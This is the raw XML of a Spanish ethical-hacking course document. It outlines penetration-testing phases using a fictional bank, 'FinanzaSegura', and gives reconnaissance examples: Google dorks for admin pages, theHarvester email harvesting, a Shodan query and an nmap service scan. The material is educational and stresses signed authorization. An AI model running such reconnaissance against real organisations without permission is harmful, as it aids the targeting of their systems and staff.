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B39D1" w14:textId="77777777" w:rsidR="00200E35" w:rsidRDefault="00200E35" w:rsidP="009605DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717B7EA3" w14:textId="5BE9C4D1" w:rsidR="009605DC" w:rsidRDefault="00643740" w:rsidP="00643740">
      <w:pP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Hacking Ético y Ciberseguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32913DB4" w14:textId="49B33800" w:rsidR="009B76E6" w:rsidRDefault="00643740" w:rsidP="00200E35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42EFBDF6" wp14:editId="4E743A34">
            <wp:extent cx="6858000" cy="3847465"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="314971992" name="Imagen 1" descr="Qué es la ciberseguridad y por qué debería ser su prioridad ? | Certi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ciberseguridad y por qué debería ser su prioridad ? | Certipro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88F7" w14:textId="77777777" w:rsidR="009B76E6" w:rsidRDefault="009B76E6" w:rsidP="00200E35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062F9F72" w14:textId="77777777" w:rsidR="009B76E6" w:rsidRDefault="009B76E6" w:rsidP="00200E35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0803FE26" w14:textId="77777777" w:rsidR="009B76E6" w:rsidRDefault="009B76E6" w:rsidP="00200E35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692814F3" w14:textId="77777777" w:rsidR="009B76E6" w:rsidRDefault="009B76E6" w:rsidP="00200E35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633E8B0C" w14:textId="77777777" w:rsidR="009B76E6" w:rsidRDefault="009B76E6" w:rsidP="00200E35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A3FCAE" w14:textId="021CF450" w:rsidR="00D10E02" w:rsidRDefault="00B001FE" w:rsidP="00291469">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Metodologías para la realización de Hacking Ético</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC7AF4" w14:textId="1B749960" w:rsidR="0002597A" w:rsidRPr="00B001FE" w:rsidRDefault="005E59B7" w:rsidP="00B001FE">
      <w:r w:rsidRPr="005E59B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47A6F09F" wp14:editId="50EAADC7">
            <wp:extent cx="4788886" cy="2103120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="281930091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0091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0" cy="21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9B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48CB71A8" wp14:editId="3FD42421">
            <wp:extent cx="4853940" cy="2492588"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="987185411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85411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89" cy="24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97A" w:rsidRPr="0002597A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="479B6DF3" wp14:editId="226F1B3C">
            <wp:extent cx="4846320" cy="2597717"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3126734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3448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306" cy="26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87E0" w14:textId="54E3CB99" w:rsidR="00291469" w:rsidRPr="005A2D3A" w:rsidRDefault="003B0490" w:rsidP="003B0490">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk210514930"/>
      <w:r w:rsidRPr="005A2D3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fases de la Metodología Presentada (definición general)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7F4D7D" w14:textId="725F528A" w:rsidR="003B0490" w:rsidRDefault="003B0490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Definicion del alcance: </w:t>
      </w:r>
      <w:r>
        <w:t>Establecer que sistemas se van a probar y los limites de la prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7746F" w14:textId="20C15A8A" w:rsidR="003B0490" w:rsidRDefault="003B0490">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recopilacion de información:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Reunir datos sobre el objetivo (Reconocmiento)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A505DCD" w14:textId="621B35BC" w:rsidR="003B0490" w:rsidRDefault="006F7B2C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7B2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identificación y análisis de vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7B2C">
        <w:t>: Detectar debilidades en el sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94DA40" w14:textId="6E8F6F57" w:rsidR="006F7B2C" w:rsidRDefault="006F7B2C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7B2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explotación de vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7B2C">
        <w:t>: Intentar aprovechar las fallas encontradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB5190" w14:textId="4D5ECC65" w:rsidR="006F7B2C" w:rsidRDefault="006F7B2C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7B2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-explotación</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7B2C">
        <w:t>: Evaluar el impacto real del acceso obtenido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F68822" w14:textId="119AE8FD" w:rsidR="006F7B2C" w:rsidRDefault="006F7B2C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7B2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elaboración del reporte</w:t>
      </w:r>
      <w:r w:rsidRPr="006F7B2C">
        <w:t>: Documentar hallazgos y recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFE648" w14:textId="69925211" w:rsidR="006F7B2C" w:rsidRDefault="006F7B2C" w:rsidP="006F7B2C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aspectos Éticos Importantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E6DF4" w14:textId="1AFDC36F" w:rsidR="006F7B2C" w:rsidRPr="006F7B2C" w:rsidRDefault="006F7B2C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ontrato firmado: </w:t>
      </w:r>
      <w:r>
        <w:t>Siempre debe existir autorización formal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F95FDD" w14:textId="664F317D" w:rsidR="006F7B2C" w:rsidRDefault="00C135F3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C135F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Definir roles y responsabilidades </w:t>
      </w:r>
      <w:r w:rsidRPr="00C135F3">
        <w:t>entre el cliente y el pentester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CB766" w14:textId="66ADD7FC" w:rsidR="00C135F3" w:rsidRDefault="00C135F3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C135F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis de políticas</w:t>
      </w:r>
      <w:r w:rsidRPr="00C135F3">
        <w:t xml:space="preserve"> organizacionales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CC891" w14:textId="1065AEC4" w:rsidR="00C135F3" w:rsidRDefault="00C135F3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C135F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedimiento ante intrusiones de terceros</w:t>
      </w:r>
      <w:r w:rsidRPr="00C135F3">
        <w:t>: Qué hacer si se detecta actividad maliciosa real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE7715E" w14:textId="64907496" w:rsidR="00C135F3" w:rsidRPr="00011DB8" w:rsidRDefault="00C135F3" w:rsidP="00C135F3">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00011DB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fases de la Metodología Presentada con ejemplos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D509CB8" w14:textId="45839C6E" w:rsidR="00C135F3" w:rsidRPr="00C5507B" w:rsidRDefault="0087197A" w:rsidP="0087197A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5507B">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DEFINICIÓN DEL ALCANCE DEL TEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5A1F9" w14:textId="13DC89CF" w:rsidR="0087197A" w:rsidRDefault="0087197A" w:rsidP="0087197A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Esta fase establece los límites, reglas y objetivos de la prueba. Identificando las áreas a evaluar y asegurando que las reglas de interacción sean claras y firmadas por ambas partes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180F82BD" w14:textId="4A3C6C90" w:rsidR="0087197A" w:rsidRDefault="00B018D9" w:rsidP="0087197A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00B018D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EJEMPLO PRÁCTICO:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B018D9">
        <w:t>Imagina que eres contratado por un banco llamado "FinanzaSegura". Antes de empezar, debes crear un documento que especifique:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB617F" w14:textId="049DF878" w:rsidR="00B018D9" w:rsidRPr="00B018D9" w:rsidRDefault="00B018D9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lcance: </w:t>
      </w:r>
      <w:r>
        <w:t>Auditaras la app web del banco (</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00AB4CEA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>www.finanzasegura.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>) y la red interna de las sucursales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED6AA1" w14:textId="5C93851A" w:rsidR="00B018D9" w:rsidRPr="008367B3" w:rsidRDefault="008367B3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Exclusiones: </w:t>
      </w:r>
      <w:r>
        <w:t>NO puedes atacar los sistemas de producción de la base de datos principal ni el sistema de cajeros automáticos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417A2775" w14:textId="1DFEBF48" w:rsidR="008367B3" w:rsidRPr="008367B3" w:rsidRDefault="008367B3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eriodo: </w:t>
      </w:r>
      <w:r>
        <w:t>Del 15 al 30 de octubre de 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6DE16" w14:textId="728D9726" w:rsidR="008367B3" w:rsidRPr="008367B3" w:rsidRDefault="008367B3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Horarios: </w:t>
      </w:r>
      <w:r>
        <w:t>Solo de 10PM a 6AM para no afectar operaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635C226" w14:textId="2AB88A4B" w:rsidR="008367B3" w:rsidRPr="008367B3" w:rsidRDefault="008367B3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ontactos: </w:t>
      </w:r>
      <w:r w:rsidRPr="008367B3">
        <w:t>Juan Pérez (CTO) será tu contacto de emergencia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D6308" w14:textId="2B4A9276" w:rsidR="008367B3" w:rsidRPr="00C5507B" w:rsidRDefault="00C5507B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5507B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tipo de prueba: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5507B">
        <w:t>Caja gris (tienes acceso básico como usuario registrado, pero no acceso administrativo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29772840" w14:textId="20B1B1E5" w:rsidR="00C5507B" w:rsidRPr="00C5507B" w:rsidRDefault="00C5507B" w:rsidP="00C5507B">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5507B">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>RECOPILACIÓN DE INFORMACIÓN (Reconocimiento)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7DCEC" w14:textId="636AD121" w:rsidR="00C135F3" w:rsidRDefault="00C5507B" w:rsidP="00C135F3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En esta fase se recolecta información del sistema objetivo: direcciones IP, </w:t>
      </w:r>
      <w:r w:rsidR="00DF21EC">
        <w:t>servidores</w:t>
      </w:r>
      <w:r>
        <w:t>, subdominios, tecnologías empleadas, permitiendo diseñar una estrategia de ataque realista</w:t>
      </w:r>
      <w:r w:rsidR="00DF21EC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF6560" w14:textId="118E6F59" w:rsidR="00DF21EC" w:rsidRPr="00DF21EC" w:rsidRDefault="00DF21EC" w:rsidP="00C135F3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF21EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EJEMPLO PRÁCTICO - Reconocimiento Pasivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364EA44" w14:textId="77777777" w:rsidR="00DF21EC" w:rsidRPr="00DF21EC" w:rsidRDefault="00DF21EC" w:rsidP="00DF21EC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF21EC">
        <w:t>Para el banco "FinanzaSegura", usarías herramientas como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A4E11" w14:textId="272B3A3D" w:rsidR="00301CAD" w:rsidRDefault="00301CAD" w:rsidP="00301CAD">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00301CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Google Dork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01CAD" w:rsidRPr="00301CAD" w14:paraId="27CC7B06" w14:textId="77777777" w:rsidTr="00301CAD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE74EF2" w14:textId="581B763E" w:rsidR="00301CAD" w:rsidRPr="00301CAD" w:rsidRDefault="00301CAD" w:rsidP="00301CAD">
            <w:r w:rsidRPr="00301CAD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>site:finanzasegura.com filetype:pdf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00301CAD">
              <w:t>site:finanzasegura.com inurl:admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6958D336" w14:textId="77777777" w:rsidR="00301CAD" w:rsidRPr="00301CAD" w:rsidRDefault="00301CAD" w:rsidP="00301CAD">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00301CAD">
        <w:t>Esto te ayuda a encontrar documentos públicos o páginas de administración expuestas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4933F3B4" w14:textId="77777777" w:rsidR="00301CAD" w:rsidRPr="00301CAD" w:rsidRDefault="00301CAD" w:rsidP="00301CAD">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00301CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TheHarvester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01CAD" w:rsidRPr="00B941CC" w14:paraId="270927AC" w14:textId="77777777" w:rsidTr="00301CAD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1772B7FD" w14:textId="621DF944" w:rsidR="00301CAD" w:rsidRPr="00301CAD" w:rsidRDefault="00301CAD" w:rsidP="00301CAD">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00301CAD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>theHarvester -d finanzasegura.com -b all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2377F6AA" w14:textId="77777777" w:rsidR="00301CAD" w:rsidRPr="00C35C7D" w:rsidRDefault="00301CAD" w:rsidP="00301CAD">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00301CAD">
        <w:t xml:space="preserve">Recopilas emails como: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00301CAD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>juan.perez@finanzasegura.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00301CAD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00301CAD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>maria.lopez@finanzasegura.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DC5C974" w14:textId="536B0FCF" w:rsidR="00301CAD" w:rsidRPr="00301CAD" w:rsidRDefault="00301CAD" w:rsidP="00301CAD">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sobre Google Dork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01CAD" w14:paraId="040E5E4C" w14:textId="77777777" w:rsidTr="00301CAD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0238E74A" w14:textId="77777777" w:rsidR="00301CAD" w:rsidRDefault="00923416" w:rsidP="00301CAD">
            <w:r>
              <w:t xml:space="preserve">Es el uso de operadores avanzados de búsquedas de Google para encontrar información especifica en la web – a veces información que no debería estar fácil,mente accesible -. </w:t>
            </w:r>
            <w:r w:rsidRPr="00923416">
              <w:t>Es simplemente aprovechar comandos como site:, filetype:, inurl:, intitle: y combinarlos para filtrar resultados con mucha precisión.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132A50A9" w14:textId="77777777" w:rsidR="00923416" w:rsidRDefault="00923416" w:rsidP="00301CAD"/>
          <w:p w14:paraId="0D6C0527" w14:textId="4B5E39E8" w:rsidR="00923416" w:rsidRPr="00A81C4F" w:rsidRDefault="00923416" w:rsidP="00301CAD">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>¿De donde viene?</w:t>
            </w:r>
            <w:r w:rsidR="00A81C4F">
              <w:br/>
              <w:t xml:space="preserve">El termino gano popularidad con la </w:t>
            </w:r>
            <w:r w:rsidR="00A81C4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Google Hacking Database (GHDB), </w:t>
            </w:r>
            <w:r w:rsidR="009636B8" w:rsidRPr="009636B8">
              <w:t>un repositorio público de consultas (dorks) que pueden revelar desde documentos públicos hasta páginas de administración sin protección</w:t>
            </w:r>
            <w:r w:rsidR="009636B8">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="009636B8" w:rsidRPr="009636B8">
              <w:t>Se usa tanto por investigadores de seguridad como por personas con malas intenciones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
    </w:tbl>
    <w:p w14:paraId="2CE6D24D" w14:textId="77777777" w:rsidR="00011DB8" w:rsidRDefault="00011DB8" w:rsidP="00011DB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEB28F9" w14:textId="42018FDE" w:rsidR="00011DB8" w:rsidRPr="00301CAD" w:rsidRDefault="00011DB8" w:rsidP="00011DB8">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r w:rsidRPr="00301CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow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11DB8" w14:paraId="55A8A4A4" w14:textId="77777777" w:rsidTr="00011DB8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20220F10" w14:textId="7CC77B99" w:rsidR="00011DB8" w:rsidRDefault="00011DB8" w:rsidP="00011DB8">
            <w:r w:rsidRPr="00011DB8">
              <w:t>hostname:finanzasegura.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D35DF55" w14:textId="77777777" w:rsidR="00011DB8" w:rsidRPr="00011DB8" w:rsidRDefault="00011DB8" w:rsidP="00011DB8">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00011DB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado práctico</w:t>
      </w:r>
      <w:r w:rsidRPr="00011DB8">
        <w:t>: Encuentras que tienen un subdominio olvidado: test.finanzasegura.com que aún está activo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D95BDA" w14:textId="7B5D208E" w:rsidR="00710D99" w:rsidRPr="00011DB8" w:rsidRDefault="0019419C" w:rsidP="0019419C">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00710D99" w:rsidRPr="00710D99">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IDENTIFICACIÓN DE VULNERABILIDADES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26705423" w14:textId="3C6B71FF" w:rsidR="007B47A9" w:rsidRDefault="00C7690D" w:rsidP="00C7690D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C7690D">
        <w:t>Utilizando herramientas especializadas y técnicas manuales, se identifican posibles vulnerabilidades en los activos analizados, incluyendo escaneos de puertos, búsqueda de servicios expuestos, validación de contraseñas débiles y detección de configuraciones inseguras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7764647F" w14:textId="103CE860" w:rsidR="00C7690D" w:rsidRPr="00C7690D" w:rsidRDefault="00C7690D" w:rsidP="00C7690D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7690D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EJEMPLO PRÁCTICO - Escaneo Activo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C7690D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap - Escaneo de puerto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7690D" w14:paraId="71904A55" w14:textId="77777777" w:rsidTr="00C7690D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AD6127F" w14:textId="6C6A786F" w:rsidR="00C7690D" w:rsidRPr="00C7690D" w:rsidRDefault="00C7690D" w:rsidP="00C7690D">
            <w:r w:rsidRPr="00C7690D">
              <w:t>nmap -sV -sC 192.168.1.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
